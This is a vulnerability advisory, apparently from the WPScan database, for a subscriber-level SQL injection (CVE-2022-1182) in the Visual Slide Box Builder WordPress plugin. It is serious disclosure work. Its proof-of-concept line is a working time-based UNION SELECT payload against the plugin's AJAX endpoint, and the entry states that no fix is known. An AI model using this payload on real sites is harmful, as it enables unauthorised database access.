WordPress Plugin Vulnerabilities

Visual Slide Box Builder <= 3.2.9 - Subscriber+ SQLi

Description

The plugin does not sanitise and escape various parameters before using them in SQL statements via some of its AJAX actions available to any authenticated users (such as subscriber), leading to SQL Injections

Proof of Concept

As a subscriber: https://example.com/wp-admin/admin-ajax.php?action=vsbb_get_one&idx=1%20union%20select%201,2,3,4,5,sleep(10)

Affects Plugins

Plugin icon
wp-visual-slidebox-builder
No known fix

References

CVE
CVE-2022-1182

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
p7e4
Submitter
p7e4
Submitter website
https://github.com/p7e4
Submitter twitter
p7e4_
Verified
Yes
WPVDB ID
01d108bb-d134-4651-9c74-babcc88da177

Timeline

Publicly Published
2022-04-19 (about 2 years ago)
Added
2022-04-19 (about 2 years ago)
Last Updated
2022-04-20 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
Contextual Related Posts < 1.8.10.2 - Multiple Parameter SQL Injection
Published
2015-07-15
Title
Auto Affiliate Links < 5.0 - Authenticated Blind SQL Injection
Published
2022-02-16
Title
WP Statistics < 13.1.6 - Unauthenticated Blind SQL Injection via IP
Published
2015-10-09
Title
Limit Attempts < 1.1.1 - SQL Injection
Published
2022-05-02
Title
WP Contacts Manager <= 2.2.4 - Unauthenticated SQLi